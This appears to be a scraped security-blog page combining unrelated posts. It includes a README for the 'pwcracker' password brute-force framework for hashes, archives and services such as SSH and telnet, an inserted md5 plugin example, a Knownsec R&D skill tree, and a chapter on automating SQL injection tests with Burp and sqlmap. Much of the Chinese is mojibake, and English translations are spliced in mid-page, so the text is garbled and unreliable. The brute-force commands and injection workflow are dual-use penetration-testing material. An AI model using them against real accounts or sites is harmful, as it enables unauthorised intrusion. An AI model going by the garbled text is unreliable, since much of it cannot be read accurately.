密码砎解脚本调甚框架目前支持密文文件服务和应甚等类型的20种密码砎解。

压猩包密码砎解

䞀、简介

该项目䞻芁解决以䞋问题

问题 解决
䞀些自定义算法䞍垞甚的文件冷闚的服务劂䜕爆砎 支持自定义插件猖写
python的爆砎脚本埈倚特别零散劂䜕把它们集合到䞀起 将其栞心爆砎功胜猖写成插件由框架统䞀调甚
猖译型的爆砎工具圚爆砎过皋䞭莫名倱莥劂䜕调试 可以䞎时修改脚本蟓出调匏

目前工具的䌘势和猺陷请各䜍根据其特点。自行选择圚那种场景䞋䜿甚。

䌘点 猺陷
支持倚种类型的爆砎比劂密文文件服务和应甚等 速床盞对比蟃慢于hydra等工具盞比
支持通甚算法也可以自定义算法 郚分插件的环境有点隟配眮有些插件甚的python包比蟃隟安装容易报错
支持倚种爆砎暡匏倚莊号倚密码单莊号倚密码倚莊号单密
支持单䞪目标也可以批量

二、快速䜿甚

2.1 安装

git clone https://github.com/c0ny1/pwcracker
pip install -r requirement.txt
python pwcracker.py

2.2 参数列衚

$ python pwcracker.py -h
usage: pwcracker.py [options]

* An expandable password cracking framework. *
By c0ny1 (http://gv7.me)

optional arguments:
  -h, --help            show this help message and exit

CRACK:
  -t TARGET             The target to crack,target format:protocol://path:port
  -T FILE               Load the target file to be cracked.
  -u USERNAME, --username USERNAME
                        The user name to crack.
  -U FILE               The user name dictionary file to load.
  -p PASSWORD, --password PASSWORD
                        Passwords to crack.
  -P FILE               Load the password dictionary file to be cracked.
  -r THREADS            Num of scan threads for each scan process, 3 by default

SHOW:
  -s, --show            Show all plugins
  -i PLUGIN_NAME, --info PLUGIN_NAME
                        Show one plugins
  -v                    Show the details of the cracking password.
  -V, --version         show program's version number and exit

2.3 Examples

(1) Crack an MD5 digest

python pwcracker.py -t md5:// -P D://password.txt

(2) Crack a zip file

python pwcracker.py -t zip://d://test.zip -U D://username.txt -P D://password.txt

(3) Crack telnet

python pwcracker.py -t telnet://192.168.1.108:23 -U D://username.txt -P D://password.txt

䞉、插件列衚

序号 插件 描述
1 md2 甚于爆砎md2算法的密文
2 md4 甚于爆砎md4算法的密文
3 md5 甚于爆砎md5算法的密文
4 sha1 甚于爆砎sha1算法的密文
5 sha224 甚于爆砎sha224算法的密文
6 sha256 甚于爆砎sha256算法的密文
7 sha384 甚于爆砎sha384算法的密文
8 sha512 甚于爆砎sha512算法的密文
9 ftp 甚于爆砎ftp服务的莊户密码
10 ssh 甚于爆砎ssh服务的莊户密码
11 telnet 甚于爆砎telnet服务的莊户密码
12 mysql 甚于爆砎mysql数据库的莊户密码
13 oracle 甚于爆砎oracle数据库的莊户密码
14 oracle_sid 甚于爆砎oracle数据库的sid
15 mssql 甚于爆砎mssql数据库的莊户密码
16 vnc 甚于爆砎vnc服务的莊户密码
17 7z 甚于爆砎7z文件的密码
18 rar 甚于爆砎rar文件的密码
19 zip 甚于爆砎zip文件的密码
20 pdf 甚于爆砎pdf文件的密码

四、插件猖写

4.1 插件暡板

#coding=utf-8

def plu_info():
    dict_plugin = {}
    dict_plugin['name'] = "md5"  # plugin name
    dict_plugin['author'] = "c0ny1<root@gv7.me>"  # author
    dict_plugin['date'] = "2018-09-24 18:23"  # last updated
    dict_plugin['description'] = "Used to crack MD5 ciphertext."  # description
    dict_plugin["usage"] = "python pwcracker.py -t test://127.0.0.1 -u root -p root"  # usage example
    return dict_plugin

def doCheck(address, username_list, password_list):
    # Optional: validate the target and the dictionaries before cracking;
    # return True to proceed, False to make the framework stop.
    pass

def doCracker(address, username, password):
    # Required: try one username/password pair against the target;
    # return (True, msg) on success, (False, msg) otherwise.
    pass

4.2 诎明

  1. plu_info凜数甚于返回插件的䞀些信息圓执行python pwcracker.py --info plugin_name,䌚圚控制台星瀺插件的信息。

  2. doCheck(address,username_list,password_list)凜数是圚爆砎前对爆砎的目标字兞列衚密码列衚进行检查。劂果检查合栌则返回True,就可以进行爆砎了。若果检查是存圚问题则返回False框架就䌚终止运行并提瀺䞍合法的数据䜍眮。

  3. doCrack(address,username,password)凜数是必须芁实现的。䌠入的参数分别是爆砎的目标甚户名和密码。我们需芁圚凜数䜓内实现爆砎的栞心功胜。爆砎成功则return True,msg,倱莥则return False,msg。这里msg是成功或者倱莥附垊的信息没有的话可以讟眮䞺None。

泚意:

  1. plu_info()和doCheck(address,username_list,password_list)䞺可选实现doCrack(address,username,password)必须实现
  2. 具䜓䟋子可以参数项目plus䞋的插件。

4.3 API

框架提䟛的API

api 描述
getPath(address) 从目标address䞭分析出路埄或者䞻机等目标䞻䜓等信息
getPort(address) 从目标address䞭分析出port
getParam(address) 从目标address䞭分析出携垊的参数
isIP(ip) 刀断是吊是合法的ip
isPort(port) 刀断是吊是合法的port即范囎䞺倧于等于0小于等于65535
checkIP 检查ip是吊存掻
checkPort 检查端口是吊匀攟
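As an added example (not code from the pwcracker project), the file below implements the 4.2 plugin contract (plu_info / doCheck / doCrack) for the md5 target and supplies stand-ins for the getPath / getPort / getParam / isIP / isPort helpers of 4.3 so that it runs without the framework. The convention that the digest travels in the target path (md5://<digest>), the make_target helper and the run_plugin driver loop are my assumptions, not documented behaviour of pwcracker.

```python
# Added example, not code from the pwcracker project. Stand-ins for the 4.3
# helpers come first; the md5 plugin written to the 4.2 contract follows.
# Assumption of mine: the digest to test is carried in the target path,
# i.e. md5://<32 hex chars>.
import hashlib
import re
from urllib.parse import parse_qs

HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")
TARGET = re.compile(r"^(.*?)(?::(\d{1,5}))?$")   # path, then optional :port


def _split(address):
    """Split 'protocol://path:port?k=v' into (scheme, path, port, query)."""
    scheme, sep, rest = address.partition("://")
    if not sep:
        scheme, rest = "", address
    rest, _, query = rest.partition("?")
    m = TARGET.match(rest)
    return scheme, m.group(1), m.group(2) or "", query


def getPath(address):
    return _split(address)[1]


def getPort(address):
    port = _split(address)[2]
    return int(port) if port else None


def getParam(address):
    return {k: v[-1] for k, v in parse_qs(_split(address)[3]).items()}


def isIP(ip):
    parts = str(ip).split(".")
    return len(parts) == 4 and all(p.isdigit() and int(p) <= 255 for p in parts)


def isPort(port):
    return isinstance(port, int) and 0 <= port <= 65535


# ---- plugin: the three functions the framework looks for ------------------

def plu_info():
    """Shown by `python pwcracker.py --info md5`."""
    return {
        "name": "md5",
        "author": "example",
        "date": "2018-09-24 18:23",
        "description": "Checks candidate passwords against an MD5 digest.",
        "usage": "python pwcracker.py -t md5://<digest> -P password.txt",
    }


def doCheck(address, username_list, password_list):
    """Pre-flight validation; False makes the framework stop before cracking."""
    if not HEX32.match(getPath(address)):
        return False                      # target is not an MD5 digest
    return bool(password_list)            # nothing to try otherwise


def doCrack(address, username, password):
    """One attempt. Returns (True, msg) on a hit, (False, None) otherwise."""
    digest = getPath(address).lower()
    if hashlib.md5(password.encode("utf-8")).hexdigest() == digest:
        return True, "%s -> %s" % (digest, password)
    return False, None


def make_target(password):
    """Constructed sample target: md5:// plus the digest of `password`."""
    return "md5://" + hashlib.md5(password.encode("utf-8")).hexdigest()


def run_plugin(address, username_list, password_list):
    """Mimic the framework's driver loop: validate, then try each pair and
    stop at the first success. Returns (password, msg) or (None, None)."""
    if not doCheck(address, username_list, password_list):
        raise ValueError("doCheck rejected the target or the dictionaries")
    for user in username_list or [None]:      # the md5 target needs no username
        for pw in password_list:
            hit, msg = doCrack(address, user, pw)
            if hit:
                return pw, msg
    return None, None


if __name__ == "__main__":
    target = make_target("password123")       # constructed weak digest
    print(run_plugin(target, [], ["letmein", "password123", "qwerty"]))
    print(getPath("telnet://192.168.1.108:23"), getPort("telnet://192.168.1.108:23"))
```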

5. Reference projects

The post RAR password cracking, ZIP password cracking, archive password cracking: pwcracker appeared first on 🔰雨苁ℒ🔰.


知道创宇研发技胜衚 v3.1 黑客孊习技胜树


知道创宇研发技胜衚 v3.1 暗眑眑址倧党

  • 通甚技胜
    • 公叞䞎䞪人
      • 公叞是盈利性组织
      • 䞪人和公叞必须双赢
      • 圚讀同公叞理念䞔胜借给公叞创造足借价倌的基础䞊䞺䞪人发展而工䜜
    • idea
      WHO AM I
      • 黑客是守正出奇䞔具倇创造力的矀䜓
        • 守正出奇
          • 这条正道/底线埗坚守
          • 䜆劂果倪过正就迂腐了䞺了搞定任务有时埗出奇招
        • 创造力
          • 䞀䞪没有创造力的人是倚么的可怜对于团队来诎也是䞀种耻蟱
          • 本技胜衚的本莚目的只有䞀䞪匕富䜠拥有足借的创造力
      • 黑客也可以是䞀种思绎方匏
      • 我们需芁对埗起名片䞊的那䞪倎衔工皋垈、研究员
      • 牛人姿态
        • 即䜿现圚䞍是牛人也埗具倇这样的姿态
        • 没有䞀定扎实内功䞎远见的人埈少有这样的姿态
        • 拥有䞍将就的做事风栌迟早是牛人
    • 劂䜕做事
      • idea
        方法论
        • 完成䞀件事有奜几条途埄䌘秀的人的途埄最短
        • 任务拆分埈容易埗出做事的方法论
        • 奜的「方法论」䌚让䜠具倇曎区的「创造力」
          • idea
            时刻问自己「是吊具倇创造力」
      • idea
        任务拆分
        • 成长过皋䌚经历胜力越倧、莣任越倧、事情越倚
        • 思路
          • 拆分细化䞺倚䞪点
          • 排奜䌘先级
            • 任务四象限决定䌘先级
              • 玧急重芁
                • 赶玧搞定
              • 重芁䞍玧急
                • 时刻保持关泚以免沊䞺「玧急重芁」
              • 玧急䞍重芁
                • 少少益善孊䌚拒绝
              • 䞍玧急䞍重芁
                • 靠自埋
          • SMART原则
            • S任务是吊明确
              • 䞍明确的任务搞起来就是浪莹生呜
            • M任务是吊可床量
              • 䞍可床量劂䜕䜓现价倌
            • A任务是吊可搞定
              • 搞䞍定就䞍应该接接就埗有魄力搞定
            • R任务的盞关性劂䜕
              • 决定了任务的价倌盞关性越高越胜䜓现价倌比劂这䞪任务搞定了胜让团队获埗公叞、客户等曎倧的讀可
            • T任务的时闎
              • Timeline任务时闎蜎什么时闎点需芁搞定什么
              • Deadline任务的最后期限做评䌰时最奜提前因䞺总䌚有各种意倖或拖延本性
              • Timeline䞊䞀些埈关键的时闎点我们可以称䞺里皋碑搞定每䞪里皋碑应该庆祝䞋
          • 自己欠猺什么立马发现
          • 是吊需芁寻求垮助谁胜垮䜠自己单干

            Arrow Link

          • 团队
            • 士气第䞀
            • 圓䜠有团队时分配䞎调床奜任务埈关键
              • 做埗奜是真并发
              • 做䞍奜䌚死锁
      • 沟通、反銈䞎莣任
        • 䞀䞪无沟通胜力的人芁么是倩才芁么是䞍可爱的人䞍过倩才也就寥寥无几而已䜠并䞍是
        • 反銈芁及时
          • 避免出问题䞍反銈圱响进床
          • 方匏
            • 正匏的邮件
            • 䞎时的埮信等即时通信
            • 着急的给䞪电话
        • 工䜜有倧小莣任心无倧小
        • 呚报的透明
          • 意义倧家互盞了解工䜜䞎心埗有利于自己的刀断䞎成长
            • 观察是䞀种倚重芁的技胜
            • 䞍是单纯的给领富汇报工䜜
          • 呚报需䜓现本呚工䜜总结、䞋呚工䜜计划、心埗/问题/建议我们叫唧唧歪歪
          • 呚报可以埈奜䜓现䞀䞪人的
            • 总结胜力
            • 计划胜力
            • 分享胜力
              • 想象䞋䞀䞪人从来没有心埗/问题/建议的沉淀或反銈这䞪人是䞀䞪盞对封闭的人圚团队䜜战䞭埈隟蟟到默契
              • 圓然这种分享胜力远䞍仅仅是圚呚报这种圢匏里
      • 团队意识
        • 埈倚人郜诎自己具倇足借奜的团队意识䜆是有些人华并䞍是这样
          • 䞟䞪小䟋子䞀䞪10人团队纊定早䞊10点匀䌚而䜠迟到了10分钟对于团队来诎䜠浪莹了敎䞪团队100分钟10人*10分钟的生呜。有些人无矞愧之心芁么是意识䞍到这点芁么这䞪团队的风气就是这样 
        • 团队意识是建立圚互盞信任的基础䞊
        • Leader最关键䌘秀的Leader䞀定䌚有䞪䌘秀团队
          • 兵熊熊䞀䞪
          • 将熊熊䞀窝
        • 劂䜕拥有䞪䌘秀的团队是䞀䞪倍杂的话题
    • Growth
      • Sensitivity to new things
        • Stay curious
        • Do not stay confined to your own circle; cross boundaries occasionally to absorb inspiration
        • Subscribe to good domestic and foreign blogs/resources (Inoreader / 深蓝阅读 are good)
        • Attend necessary conferences selectively, listen to the necessary topics, discuss the necessary subjects
      • About knowledge
        • Your thirst for knowledge determines the size of your drive forward
        • When knowledge is laid cheaply in front of you, you tend not to cherish it
        • Keep a sense of awe toward knowledge
      • Do not let yourself become a pretentious/showy person
      • Be with people better than you; work with first-rate people
        • Their pointers are often the essence
        • Prevent the fool explosion
          • People hired by second-rate people are unlikely to be first-rate
          • Over time a team explodes with fools
      • Thinking
        • Critical thinking
        • Thinking from the other side's position
          • For a team this is all-important
      • The art of asking questions
        • When you hit a problem, think independently first, try to solve it yourself, and ask only after your best effort
        • When asking, courtesy is key (awe toward knowledge) and clear expression is key
        • After solving it, share it to help more people who need help
      • Small-things mindset
        • The more basic a thing, the more key it is and the more care it needs
        • Do not blindly chase a "sense of sophistication" while neglecting "small"/"simple"/"basic" things
        • If the foundation is not solid, the ground shakes and the mountain moves
        • If you cannot do small things well, do not talk about big ones
      • Whether an individual or a team, growth needs continual accumulation of knowledge; without accumulation the foundation is unstable
    • The definition of "done"
      • For example, writing a PoC
        • 1. Understood the principle of the target web application vulnerability
        • 2. Proficient with the relevant Python modules and mechanisms
        • 3. Thoroughly understood the HTTP protocol
          • HTTP request
          • HTTP response
        • 4. Code written to a standard that is a pleasure to read
        • 5. Program sufficiently tested
          • Black-box testing
          • White-box testing
        • 6. Progress fed back promptly
          • I ran into difficulty
          • I got it done
        • 7. Related documentation updated (accumulation)
    • The definition of "proficient"
      • For example, proficiency in SQL injection
        • I can write the SQL "language" fluently without looking at documentation
        • I know the SQL-specific functions, stored procedures and mechanisms of the mainstream databases like the back of my hand
          • MySQL
          • MSSQL
          • Oracle
          • PostgreSQL
          • Access
          • SQLite
          • ...

        • The great tools: I not only use them naturally, I have read their source several times and can modify them
          • sqlmap
          • ...

        • I am creative, not merely following behind the big names
          • Worked out several good techniques
          • Published several good papers
          • Gave several talks at external conferences/salons
          • Wrote my own related tools (a pleasure)
        • I have done it for real N times, met many bizarre environments, and am confident enough to bypass them
        • Only after all of the above is it called proficient; the same applies to everything else
    • 奜乊掚荐
      • 掚荐理由
        • 打通任督二脉的乊怎胜䞍看
          • 䜆尜信乊䞍劂无乊
        • 任䜕科孊研究最终必须至少到哲孊层面觊碰到䞊垝的脚
        • 具䜓技术类乊籍请见「䞓䞚技胜」盞关郚分
      • 鞡汀类
        • 黑客䞎画家
          • 印象深刻讟计者的品味
            • 奜讟计是简单的讟计
              • 抓䜏本莚
            • 奜讟计是氞䞍过时的讟计
              • 劂果解决方法是䞑陋的那就肯定还有曎奜的解决方法只是还没有发现而已
            • 奜讟计是解决䞻芁问题的讟计
            • 奜讟计是启发性的讟计
            • 奜讟计通垞是有点趣味性的讟计
            • 奜讟计是艰苊的讟计
            • 奜讟计是看䌌容易的讟计
            • 奜讟计是对称的讟计
            • 奜讟计是暡仿倧自然的讟计
            • 奜讟计是䞀种再讟计
            • 奜讟计是胜借倍制的讟计
            • 奜讟计埀埀是奇特的讟计
            • 奜讟计是成批出现的
            • 奜讟计垞垞是倧胆的讟计
        • 浪朮之巅
          • 感受IT垝囜的厛起䞎没萜我们现圚站圚又䞀䞪互联眑浪朮之巅
      • 掁癖类
        • 重构
        • 代码敎掁之道
        • 代码倧党2
      • 敏捷类
        • Rework䞭文版
          • 37signals团队的敏捷经验
        • 高效皋序员的45䞪习惯
      • 产品类
        • 人人郜是产品经理
        • 结眑
      • 神乊
        • 自私的基因
        • 倱控
      • 

  • Professional skills
    • Principles
      • Read and work through at least one book completely
      • Read the official documentation at least once
    • Fundamentals (must-have)
      • HTTP capture and debugging
        • Firefox add-ons
          • Firebug
            • Packet capture and debugging of every kind
          • Tamper Data
            • Intercept and modify
          • Live HTTP Headers
            • Replay
          • Hackbar
            • Encode/decode, POST submission
          • Modify Headers
            • Edit request headers
        • Fiddler
          • The browser-proxy tool of choice
          • Intercept requests or responses
          • Capture traffic
          • Replay
          • Craft requests
          • Encode/decode
          • Third-party extensions
            • Watcher
              • Automated audit tool for web front-end security
        • Wireshark
          • Powerful filter syntax of every kind
        • Tcpdump
          • Command-line packet capture, Wireshark-like
        • Python
          • urllib2
            • Turn on request/response debugging
              • Edit h.set_debuglevel inside urllib2's do_open
              • Change it to h.set_debuglevel(1); the request and response data, HTTPS included, is then clearly visible
      • What is a redirect
        • Server-side redirect
          • 302
            • <?php header("Location: 3.php"); ?>
          • 301
            • <?php header("HTTP/1.1 301 Moved Permanently"); header("Location: 2.php"); ?>
          • After u = urllib2.urlopen(url), u.url gives the address reached after the server-side redirect
            • A built-in feature of urllib2
            • The so-called "follows the redirect"
        • Client-side redirect
          • <meta http-equiv="refresh" content="0; url=http://www.evilcos.me" />
            • An HTML parser is enough
          • location.href="http:/" + "/evilcos.me";
            • Regex parsing is weak
            • A JavaScript engine is strong
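The two kinds of redirect listed above, as an added example that is not part of the original skill tree: server-side redirects come from the status line and Location header, meta-refresh redirects fall out of an HTML parser, and the regex approach to location.href is shown failing on exactly the concatenated form given above. The sample responses are constructed, and the regex is deliberately naive to make that weakness visible.

```python
"""Added example: tell server-side redirects from client-side ones and
extract the target of each. Sample responses below are constructed."""
import re
from html.parser import HTMLParser


class MetaRefreshParser(HTMLParser):
    """Collect targets of <meta http-equiv="refresh" content="N; url=..."> tags."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if attrs.get("http-equiv", "").lower() != "refresh":
            return
        # content looks like "0; url=http://example.test/next"
        m = re.search(r'''url\s*=\s*['"]?([^'"]+)''', attrs.get("content", ""), re.I)
        if m:
            self.targets.append(m.group(1).strip())


def server_side_redirect(status, headers):
    """Return the Location target of a 301/302/303/307/308 response, else None.
    This is what urllib2 follows on its own when it sets u.url."""
    if status in (301, 302, 303, 307, 308):
        for k, v in headers.items():
            if k.lower() == "location":
                return v
    return None


# Naive: captures one string literal after location.href =
LOCATION_HREF = re.compile(r"""location\.href\s*=\s*["']([^"']+)["']""")


def client_side_redirects(html_body):
    """Return (meta_targets, js_targets_found_by_regex) for an HTML body.

    The regex only sees the first literal, so "http:/" + "/evilcos.me"
    is recovered as "http:/" only: the weakness the skill tree points at.
    A JavaScript engine evaluating the page would see the full URL."""
    p = MetaRefreshParser()
    p.feed(html_body)
    return p.targets, LOCATION_HREF.findall(html_body)


# Constructed sample responses
META_PAGE = ('<html><head><meta http-equiv="refresh" '
             'content="0; url=http://www.evilcos.me" /></head></html>')
JS_PAGE = '<html><script>location.href="http:/" + "/evilcos.me";</script></html>'

if __name__ == "__main__":
    print(server_side_redirect(302, {"Location": "3.php"}))
    print(client_side_redirects(META_PAGE))
    print(client_side_redirects(JS_PAGE))
```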
      • Office skills
        • Word: written documents must look professional, especially those going outside
        • Excel: lots of statistics and charting features, learn to use them well
        • PPT: essential for talks and training; search for how to make good slides
        • Going further
          • yEd
          • Visio
          • FreeMind
            • This skill tree was made with it
      • Get started with Linux
        • "鞟哥的Linux私房菜" (Vbird's Linux guide)
      • Be fluent in VIM
      • Get started with Python
        • "Core Python Programming, 2nd ed."
          • Chapter 4: Python objects
            • Complete mastery
          • 6.8 Unicode
            • Complete mastery
          • 8.11 Iterators and the iter() function
            • Complete mastery
          • Chapter 9: File input and output
            • Complete mastery
          • Chapter 10: Errors and exceptions
            • Complete mastery
          • Chapter 11: Functions and functional programming
            • Complete mastery
          • Chapter 12: Modules
            • Complete mastery
          • Chapter 14: Execution environment
            • Complete mastery
          • Chapter 15: Regular expressions
            • Complete mastery
          • Chapter 18: Multithreaded programming
            • Complete mastery
          • 20.2 Web programming with Python: build a simple web client
            • Complete mastery
      • Algorithms
        • Quicksort
        • Binary search
      • Regular expressions
      • Development ability
        • Waterfall model
          • Requirements -> requirements analysis -> design -> development -> testing -> release -> operations
        • Requirements analysis ability
          • Given a requirement, how to produce an elegant execution plan: methodology
          • This ability is extremely, extremely important
        • Debugging ability
          • Once a bug is located, there is no bug that cannot be fixed
          • What the naked eye sees is an illusion
            • Professional tools and experience must work together
          • Wherever the bug appears is where the real, simulated debugging must finally happen
          • Narrow the scope
            • Build your own test cases
              • Rule out complex, unknown network conditions
            • Rule out related modules one by one
            • Python step-by-step debugging
              • import pdb;pdb.set_trace()
              • Put the line above where you need to single-step; the program breaks there when run, then use h to list the commands and debug step by step
            • Crude debugging: print
        • Agile mindset
          • Fast iteration
          • Split tasks finely
          • v1 principle: define the goal of v1 well; finishing v1 fast comes first
          • Get used to a wiki: good for accumulating and sharing knowledge
      • Getting over the Great Firewall (翻墙)
    • Web security
      • How to learn web security from zero
      • Web service components
      • Security dimensions
        • Vulnerabilities
        • Risks
        • Incidents
      • Web security standards
        • OWASP
        • WASC
      • Practice environments
      • Tools
        • My pentesting toolkit
          • Firefox
            • Firebug
              • Debug JavaScript, watch HTTP requests/responses, cookies, the DOM tree, etc.
            • Tamper Data
              • Intercept and modify
            • Live HTTP Headers
              • Replay
            • Hackbar
              • Encode/decode, POST submission
            • Modify Headers
              • Edit request headers
            • GreaseMonkey
            • NoScript
              • Block selected JavaScript
            • AutoProxy
              • Must-have for getting over the firewall
          • Chrome
            • F12
              • Opens the developer tools: roughly Firebug plus local-storage inspection and more
            • SwitchySharp
              • Must-have for getting over the firewall
            • CookieHacker
          • Web2.0 Hacking
          • HTTP proxies
            • Fiddler
              • A classic, very handy web debugging proxy
            • Burp Suite
              • Far more than an HTTP proxy: crawler, vulnerability scanner, exploitation, brute forcing and more
            • mitmproxy
              • Written in Python; building tools on this framework is extremely convenient
          • Vulnerability scanning
            • AWVS
              • A convenient scanner, and its bundled small tools are good too
            • Nmap
              • Far more than a port scanner: several hundred scripts
            • Self-written Python scripts/tools
          • Vulnerability exploitation
            • sqlmap
              • The best SQL injection tool, bar none
            • Metasploit
              • The classic penetration testing framework
            • Hydra
              • Must-have for brute forcing
          • Packet capture
            • Wireshark
              • Must-have for packet capture
            • Tcpdump
              • Command-line capture on Linux; the result can be handed to Wireshark for analysis
          • Seebug + ZoomEye
            • Platforms like these are what we need
            • Similar to Seebug
              • https://www.exploit-db.com/
            • Similar to ZoomEye
              • https://www.shodan.io/
        • Kali Linux
          • Besides the tools introduced above, a huge number of hacking tools of every kind to explore yourself
      • Books
        • "The Web Application Hacker's Handbook" (黑客攻防技术宝兞Web实战篇)
        • "癜垜子讲Web安党" (White Hat Talks Web Security)
        • "Web前端黑客技术揭秘" (Web Front-End Hacking Techniques Revealed)
          • Written by me and xisigr
        • "The Tangled Web" (Web之困)
        • "SQL Injection Attacks and Defense"
      • Papers
        • Papers from BlackHat/Defcon/XCon/KCon/domestic security salons etc. need continuous follow-up
    • Embedded security
    • Development checklist
      • Coding environment
        • pip
        • Docker/Vagrant
        • tmux/screen
        • vim
        • Markdown
        • zsh + oh-my-zsh
        • Python2.7+/3+
        • >Django1.4
        • node.js
        • Ubuntu/Gentoo/Centos
        • ipython
        • Version control
          • Abandon SVN, embrace Git fully
          • GitLab
        • Nginx+uWSGI
      • Python
        • Official manual
          • Read it at least once; without that your horizon stays narrow
          • 行之 says: "I have never read a Python book; I just read the official manual thoroughly"
      • Linux/UNIX
        • Books
          • "鞟哥的Linux私房菜" (Vbird's Linux guide)
          • "Linux Shell Scripting Cookbook" (Linux Shell脚本攻略)
          • "The Art of UNIX Programming"
          • "Software Design 䞭文版 01", "Software Design 䞭文版 02", "Software Design 䞭文版 03"
        • Make Linux the default operating system on your computer

      • Front end
        • Books
          • "DOM Scripting" (JavaScript DOM猖皋艺术)
        • Understand the DOM
          • Equally a necessary foundation for doing front-end security well
        • Libraries
          • jQuery
            • Try out the best plugins and experiment with them
            • Read the official docs once
          • D3.js
          • ECharts
            • From Baidu
          • Google API
          • ZoomEye Map component
            • Built by the ZoomEye team on open source
          • AngularJS
            • Google's disruptive front-end framework
          • Bootstrap
            • Should be used at least once
      • Crawlers, advanced
        • Proxy pool
          • Needed for crawler "stability"
        • Network requests
          • wget/curl
          • urllib2/httplib2/requests
          • scrapy
        • CAPTCHA cracking
          • pytesser
      • Scheduling
        • crontab is the most native timed scheduler
        • Distributed scheduling built on redis
        • Distributed scheduling built on rpyc
        • Scheduling frameworks such as celery/gearman
      • Concurrency
        • Thread pools
          • An elegant in-process concurrency scheme
        • Coroutines
          • Another elegant in-process concurrency scheme
          • gevent
        • Multi-process
          • os.fork
          • multiprocessing
      • Data structures
        • JSON
        • cPickle
        • protobuf
      • Data storage and processing
        • Databases
          • MySQL
          • MongoDB
          • Cassandra
          • The Hadoop ecosystem
          • Redis
          • Sqlite
          • bsddb
          • ElasticSearch
        • Big data processing
          • Hive
          • Spark
          • ELK
            • ElasticSearch
            • Logstash
            • Kibana
      • DevOps
      • Debugging
      • Algorithms
        • Word segmentation
        • Bayes
        • Neural networks
        • Genetic algorithms
        • Clustering/classification

      • Continuous integration
        • Self-testing
          • nose
        • Jenkins
      • Security
      • Collaboration
        • Online collaboration platforms like Trello
        • Slack
        • WeChat
        • Stand-up meetings
    • Design thinking
      • Everyone is an architect: how cool it is to have architectural thinking
      • Real knowledge comes from practice
      • How to design
        • Loose coupling, high cohesion
        • Units and unit attributes
        • Producers and consumers
        • Structures
          • Queue
          • LRU
        • Distributed
          • Storage
          • Computation
        • Resource considerations
          • CPU
          • Memory
          • Bandwidth
        • Crude aesthetics / brute-force aesthetics
          • With big data, run it first; only then can you tell where the patterns are
          • "Run it first" quickly opens up the whole and gives insight into the problem
          • "Run it first" frees you from the shackles of petty details
          • "Run it first" iterates quickly toward a great v1
        • In one word
          • Beauty
    • Great people 1, 2, 3
      • 1. Research: studying things with enough insight; the research level is good
      • 2. R&D: a Hack Idea, with the drive to implement it yourself; a hacker who cannot develop is like a pirate who cannot swim
      • 3. Engineering: what is developed needs real use and engineering, otherwise it is only a toy, not a real weapon
  • Quality resources


Automated SQL injection: penetration testing with Burp and sqlmap


In the OWASP Top 10, injection vulnerabilities rank first, and among them SQL injection is far more common than command injection, XPath injection or LDAP injection. That is the main topic of this chapter: how to use the combination of Burp and sqlmap to test for SQL injection vulnerabilities during a penetration test of a web application. The reader is assumed to be familiar with how SQL injection works and with basic sqlmap usage; if anything is unclear, first read the book "SQL Injection Attacks and Defense" and the sqlmap manual (preferably the official documentation).

This chapter covers:

  1. Testing SQL injection vulnerabilities with the gason plugin + sqlmap
  2. Batch-testing SQL injection vulnerabilities with an enhanced sqlmap4burp plugin + sqlmap

Testing SQL injection vulnerabilities with the gason plugin + sqlmap

Before formally starting, let us agree on two points:

  • You have installed and configured a working Python environment
  • You are familiar with sqlmap's basic command-line usage and have installed it correctly

If both hold, we can begin the content of this chapter.

Besides SQLiPy in the BApp Store (see figure), the plugins that integrate Burp Suite with sqlmap include gason and sqlmap4burp. The plugins differ only slightly in functionality: all of them invoke sqlmap's API through the command line to test for SQL injection. Here we take gason as the example to describe configuration, installation and use.

Installing and using the gason plugin roughly consists of the following steps:

  1. First download the gason plugin. You can get it from this address (click to download), or download the source from the official site and build it yourself; either way, obtain the plugin file gason-version.jar.

  2. Open Burp Extensions to install it: click the [Add] button and follow the figure. Installation is very simple; if anything is unclear, refer to the chapter "Using Burp Suite BApp Store plugins". If the result shown in the figure below appears and the [Output] and [Errors] tabs show no error messages, the plugin is installed successfully.

  3. After installation, when a message record is intercepted in Burp's Proxy it can be sent straight to sqlmap, as shown in the figure.

  4. If the [send to sqlmap] menu shown above does not appear, the plugin was not installed correctly and the reader needs to find out why.

  5. When we choose [send to sqlmap] on a request intercepted by Burp, the sqlmap options dialog pops up automatically. The figure shows that the plugin grabs the message content, parses it and fills in the related parameter settings, e.g. the parameters and their values, the request method (GET/POST) and the URL. Many of the option values sqlmap itself uses still have to be specified by us; the two most important are:

     bin directory: the path of sqlmap.py

     Command: the command line sqlmap is run with

  6. Setting the bin directory is easy: click the [...] button and select the location of sqlmap.py. Once the bin path is correct, the Command below updates automatically, adjusting the sqlmap command line as the settings change. If the meaning of a setting in the UI is unclear, compare the Command value before and after changing it to see which sqlmap option it maps to.

  7. Once everything is configured correctly the [run] button becomes active; click [run] and the system enters the sqlmap scanning stage. When scanning starts, the plugin adds a new tab showing the execution progress, as indicated by the arrow in the figure above.

  8. On the progress-tracking screen, [save to file] and [close tab] save the scan results and close or abort the scan.

Compared with running the sqlmap script from the command line, the gason plugin is much more convenient. On the command line we would first have to capture the cookie and paste it into the command, or type in each parameter by hand; in the gason plugin none of that is needed: when we click [send to sqlmap], the plugin does it for us. sqlmap's individual options can be set through the UI as well, which is more direct and efficient than the command line.


Batch-testing SQL injection vulnerabilities with an enhanced sqlmap4burp plugin + sqlmap

If you want to run sqlmap once and test many URLs for SQL injection, the gason plugin approach is rather cumbersome. So is there a way to test in batches? The well-known domestic security site FreeBuf has two related articles that interested readers may study:

  1. [Optimising sqlmap's batch-testing capability] http://www.freebuf.com/sectool/75296.html
  2. [How I built an automated SQL injection tool] http://www.freebuf.com/sectool/74445.html

From these two articles we can see that batch operation is very common in practice; solving the batch problem greatly improves our efficiency. Below we look at how to solve it.

The official sqlmap documentation says (see figure):

From that passage we see that sqlmap can test multiple URLs for injection in one run via the -l parameter, whose value is a Burp proxy or WebScarab proxy log file. So can a plugin generate such a log file automatically and then call sqlmap, solving the batch-testing problem? The answer is of course yes.

On GitHub, user difcareer published a Burp plugin, sqlmap4burp, with source at https://github.com/difcareer/sqlmap4burp. We extend this plugin's functionality to implement automated batch SQL injection testing.

銖先我们来规划䞀䞋这䞪插件的䜿甚场景

